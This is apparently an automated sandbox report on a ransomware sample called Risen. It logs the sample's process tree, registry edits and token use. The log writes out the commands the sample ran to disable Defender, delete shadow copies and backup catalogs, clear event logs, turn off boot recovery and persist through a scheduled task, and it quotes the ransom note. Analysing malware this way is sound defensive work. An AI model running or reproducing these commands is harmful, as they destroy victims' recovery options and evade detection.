SeSecurityPrivilege 7852 wevtutil.exe Token: SeBackupPrivilege 7852 wevtutil.exe Token: SeSecurityPrivilege 6968 wevtutil.exe Token: SeBackupPrivilege 6968 wevtutil.exe Token: SeSecurityPrivilege 8664 wevtutil.exe Token: SeBackupPrivilege 8664 wevtutil.exe Token: SeSecurityPrivilege 5700 wevtutil.exe Token: SeBackupPrivilege 5700 wevtutil.exe Token: SeSecurityPrivilege 8104 wevtutil.exe Token: SeBackupPrivilege 8104 wevtutil.exe Token: SeBackupPrivilege 8332 vssvc.exe Token: SeRestorePrivilege 8332 vssvc.exe Token: SeAuditPrivilege 8332 vssvc.exe Token: SeDebugPrivilege 7608 taskkill.exe Token: SeBackupPrivilege 9208 wbengine.exe Token: SeRestorePrivilege 9208 wbengine.exe Token: SeSecurityPrivilege 9208 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 112 wrote to memory of 4028 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 84 PID 112 wrote to memory of 4028 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 84 PID 112 wrote to memory of 3192 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 86 PID 112 wrote to memory of 3192 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 86 PID 112 wrote to memory of 4840 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 88 PID 112 wrote to memory of 4840 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 88 PID 112 wrote to memory of 1492 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 90 PID 112 wrote to memory of 1492 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 90 PID 112 wrote to memory of 5020 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 92 PID 112 wrote to memory of 5020 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 92 PID 4028 wrote to memory of 4940 4028 cmd.exe 94 PID 4028 wrote to memory of 4940 4028 cmd.exe 94 PID 112 wrote to memory of 408 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 95 PID 112 wrote to memory of 408 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 95 PID 112 wrote to memory of 2232 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 97 PID 112 wrote to memory of 2232 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 97 PID 5020 wrote to memory of 1044 5020 cmd.exe 99 PID 5020 wrote to memory of 1044 5020 cmd.exe 99 PID 3192 wrote to memory of 4516 3192 cmd.exe 100 PID 3192 wrote to memory of 4516 3192 cmd.exe 100 PID 4840 wrote to memory of 2872 4840 cmd.exe 101 PID 4840 wrote to memory of 2872 4840 cmd.exe 101 PID 1492 wrote to memory of 5048 1492 cmd.exe 102 PID 1492 wrote to memory of 5048 1492 cmd.exe 102 PID 112 wrote to memory of 4460 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 103 PID 112 wrote to memory of 4460 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 103 PID 112 wrote to memory of 5052 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 105 PID 112 wrote to memory of 5052 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 105 PID 112 wrote to memory of 5096 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 106 PID 112 wrote to memory of 5096 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 106 PID 2232 wrote to memory of 3084 2232 cmd.exe 109 PID 2232 wrote to memory of 3084 2232 cmd.exe 109 PID 408 wrote to memory of 3956 408 cmd.exe 110 PID 408 wrote to memory of 3956 408 cmd.exe 110 PID 112 wrote to memory of 2276 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 111 PID 112 wrote to memory of 2276 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 111 PID 4460 wrote to memory of 3008 4460 cmd.exe 113 PID 4460 wrote to memory of 3008 4460 cmd.exe 113 PID 112 wrote to memory of 728 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 114 PID 112 wrote to memory of 728 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 114 PID 5096 wrote to memory of 4864 5096 cmd.exe 116 PID 5096 wrote to memory of 4864 5096 cmd.exe 116 PID 112 wrote to memory of 1712 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 117 PID 112 wrote to memory of 1712 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 117 PID 5052 wrote to memory of 3460 5052 cmd.exe 118 PID 5052 wrote to memory of 3460 5052 cmd.exe 118 PID 112 wrote to memory of 4064 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 120 PID 112 wrote to memory of 4064 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 120 PID 2276 wrote to memory of 4488 2276 cmd.exe 121 PID 2276 wrote to memory of 4488 2276 cmd.exe 121 PID 112 wrote to memory of 3820 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 123 PID 112 wrote to memory of 3820 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 123 PID 728 wrote to memory of 2432 728 cmd.exe 124 PID 728 wrote to memory of 2432 728 cmd.exe 124 PID 1712 wrote to memory of 764 1712 cmd.exe 126 PID 1712 wrote to memory of 764 1712 cmd.exe 126 PID 112 wrote to memory of 628 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 127 PID 112 wrote to memory of 628 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 127 PID 4064 wrote to memory of 2972 4064 cmd.exe 129 PID 4064 wrote to memory of 2972 4064 cmd.exe 129 PID 112 wrote to memory of 4676 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 130 PID 112 wrote to memory of 4676 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 130 PID 3820 wrote to memory of 3020 3820 cmd.exe 131 PID 3820 wrote to memory of 3020 3820 cmd.exe 131 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe"C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:112 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINESoftware\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINESoftware\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:5048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:3084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:3460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:728 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:440
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1788
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2208
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1160
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "SystemDefense" /TR "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe" /F2⤵PID:3536
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "SystemDefense" /TR "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe" /F3⤵
- Creates scheduled task(s)
PID:1448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:7544
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:7652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:8256
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:7968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:8132
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:9108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:7496
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:8112
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:8068
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:6528
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:7568
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:6808
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:8016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:628
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:7924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:7996
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:8328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6460
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:8312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:8528
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:7868
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "SystemDefense" /F2⤵PID:7732
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "SystemDefense" /F3⤵PID:7572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:8036
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:5680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:7668
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:6672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WELCOME " /f2⤵PID:8292
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WELCOME " /f3⤵PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " We have penetrated your whole network due some critical security issues. We have encrypted all files on each host in the network , We have also Took your critical data AND in case of NO corporation until the end of the deadline we WILL leak or sell your data, the only way to stop this process is successful corporation. ([email protected] , TELEGRAM:@tokyosupp) AND :([email protected]) " /f2⤵PID:7976
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " We have penetrated your whole network due some critical security issues. We have encrypted all files on each host in the network , We have also Took your critical data AND in case of NO corporation until the end of the deadline we WILL leak or sell your data, the only way to stop this process is successful corporation. ([email protected] , TELEGRAM:@tokyosupp) AND :([email protected]) " /f3⤵PID:9008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:8228
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\$Risen_Note.txt2⤵PID:8224
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\$Risen_Note.txt3⤵PID:4960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\$Risen_Guide.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:8416 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\$Risen_Guide.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:3612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 14084⤵
- Program crash
PID:8756
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe"2⤵PID:8272
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:5064
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8332
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:9208
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:8908
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:7468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3612 -ip 36121⤵PID:6080
Network
